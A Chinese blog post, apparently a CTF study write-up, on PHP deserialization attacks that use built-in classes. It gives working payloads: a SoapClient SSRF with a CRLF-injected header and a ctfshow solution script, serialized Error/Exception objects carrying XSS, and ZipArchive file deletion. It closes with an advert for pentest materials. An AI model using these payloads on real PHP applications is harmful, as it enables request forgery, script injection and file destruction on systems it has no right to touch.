写点什么

今晚拿下 PHP 反序列化的一系列操作

发布于: 1 小时前

引言

在 CTF 中反序列化类型的题目还是比较常见的,之前有学习过简单的反序列化,以及简单 pop 链的构造。这次学习内容为 php 内置的原生类的反序列化以及一点进阶知识。


在题目给的的代码中找不到可利用的类时,这个时候考虑使用 php 中的一些原生类有些类不一定能够进行反序列化,php 中使用了zend_class_unserialize_deny来禁止一些类的反序列化。

基础知识

原生类常见的用法是用来进行 XSS、SSRF、反序列化、或者 XXE,今天就来好好总结一下。在 CTF 中常使用到的原生类有这几类 1、Error2、Exception3、SoapClient4、DirectoryIterator5、SimpleXMLElement 下面针对这几个类来进行总结。

SoapClient __call 方法进行 SSRF

soap 是什么?

soap 是 webServer 的三要素之一(SOAP、WSDL、UDDI),WSDL 用来描述如何访问具体的接口,UUDI 用来管理、分发、查询 webServer,SOAP 是连接 web 服务和客户端的接口,SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。所以它的使用条件为:1.需要有 soap 扩展,需要手动开启该扩展。2.需要调用一个不存在的方法触发其__call()函数。3.仅限于 http/https 协议

php 中的 soapClient 类

类摘要:PHP手册


SoapClient {/* 方法 */public __construct(string|null $wsdl, array $options = [])public __call(string $name, array $args): mixedpublic __doRequest(    string $request,    string $location,    string $action,    int $version,    bool $oneWay = false): string|nullpublic __getCookies(): arraypublic __getFunctions(): array|nullpublic __getLastRequest(): string|nullpublic __getLastRequestHeaders(): string|nullpublic __getLastResponse(): string|nullpublic __getLastResponseHeaders(): string|nullpublic __getTypes(): array|nullpublic __setCookie(string $name, string|null $value = null): voidpublic __setLocation(string|null $location = null): string|nullpublic __setSoapHeaders(SoapHeader|array|null $headers = null): boolpublic __soapCall(    string $name,    array $args,    array|null $options = null,    SoapHeader|array|null $inputHeaders = null,    array &$outputHeaders = null): mixed}
复制代码


注意这个__call()方法public __call(string $name, array $args): mixed该方法被触发的时候,它可以发送 HTTP 或 HTTPS 请求。使用这个类时,php 中的 scapClient 类可以创建 soap 数据报文,与 wsdl 接口进行交互。用法如下:


public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )第一个参数是用来指明是否是wsdl模式如果为null,那就是非wsdl模式,反序列化的时候会对第二个参数指明的url进行soap请求
如果第一个参数为null,则第二个参数必须设置location和uri 其中location是将请求发送到的SOAP服务器的URL uri是SOAP服务的目标名称空间
第二个参数允许设置user_agent选项来设置请求的user-agent头
复制代码


测试


<?php$a = new SoapClient(null,array('location'=>'http://47.xxx.xxx.72:2333/aaa', 'uri'=>'http://47.xxx.xxx.72:2333'));$b = serialize($a);echo $b;$c = unserialize($b);$c->a();    // 随便调用对象中不存在的方法, 触发__call方法进行ssrf?>
复制代码


kali 开启监听nc -lvp 4444,执行该文件。【注意开启 soap 模块】



kali 中就会返回监听到的内容


一道 CTF 题目

#index.php<?phphighlight_file(__FILE__);$vip = unserialize($_GET['vip']);//vip can get flag one key$vip->getFlag();#flag.php$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);array_pop($xff);$ip = array_pop($xff);
if($ip!=='127.0.0.1'){ die('error');}else{ $token = $_POST['token']; if($token=='ctfshow'){ file_put_contents('flag.txt',$flag); }}
复制代码


这道题目就是利用的 PHP 原生类进行反序列化来实现 SSRF,因为在这里是没有给出可利用的类,所以就需要使用原生类。在解答此题的过程中,还需要利用到 CRLF。CRLF 是回车 + 换行(\r\n)的简称,进行 url 编码后是%0a%0d%0a%0d这道题的思路就是先利用ssrf访问flag.php然后 post 一个数据 toke=ctfshow和请求头X-Forwarded-For 就能把flag写到flag.txt中了。用到SoapClient类了。这个类中有个__call魔术方法,触发时会调用SoapClient类的构造方法。


<?php$target = 'http://127.0.0.1/flag.php';$post_string = 'token=ctfshow';$y = new SoapClient(null,array('location' => $target,'user_agent'=>'test^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "flag"));$x = serialize($y);$x = str_replace('^^',"\r\n",$x);echo urlencode($x);?>
复制代码


使用 get 传入 vip 的参数即可。然后访问 flag.txt 就可以得到 flag 了。此处无报错,即是成功。


使用 Error/Exception 内置类来构造 XSS。

#index.php<?php$a = unserialize($_GET['whoami']);echo $a;?>
复制代码


Error类是 php 的一个内置类,用于自动自定义一个Error,在php7的环境下可能会造成一个 xss 漏洞,因为它内置有一个 __toString() 的方法,常用于 PHP 反序列化中。


<?php$a = new Error("<script>alert('xss')</script>");$b = serialize($a);echo urlencode($b);  ?>#output:O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A30%3A%22%3Cscript%3Ealert%28%27test%27%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A30%3A%22D%3A%5CphpStudy%5CWWW%5Cm0re%5Cindex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D
复制代码



另一种,Exception 内置类,与上述类似,只是换了一个类,将Error换成了Exception


<?php$x = new Exception("<script>alert('xss')</script>");$y = serialize($x);echo urlencode($y);  ?>
复制代码


其它与上述相同。

实例化任意类

ZipArchive::open 删除文件

使用条件:open 参数可控。


$a = new ZipArchive();$a->open('test.php',ZipArchive::OVERWRITE);  // ZipArchive::OVERWRITE:  总是以一个新的压缩包开始,此模式下如果已经存在则会被覆盖// 因为没有保存,所以效果就是删除了test.php
复制代码


在同目录下创建一个test.php。然后执行上面的代码,就会发现test.php已经被删除了。

SQLite3 创建空白文件

前提:需要有 sqlite3 扩展,且不是默认开启,需要手动开启


<?php$test = new SQLite3('test.txt');?>
复制代码


GlobIterator 遍历目录

GlobIterator::__construct(string $pattern, [int $flag])从使用$pattern构造一个新的目录迭代
复制代码


示例:


<?php$newclass = new GlobIterator("./*.php",0);foreach ($newclass as $key=>$value)    echo $key.'=>'.$value.'<br>';
?>
复制代码



SimpleXMLElement 暂无示例。


学习不止,脚步不停!欲想学安全,必先了解一番,我这里整理了 300PDF 文档,包括网络安全学习视频、全套工具包、渗透测试、技术文档、应急响应等,欢迎大家查看!!


【点我查看】

总结

PHP 反序列化的一些原生类的基础知识暂时学习到这里,后面关于 PHP 反序列化的还有 phar 反序列化,session 反序列化。慢慢来吧。

用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
今晚拿下PHP反序列化的一系列操作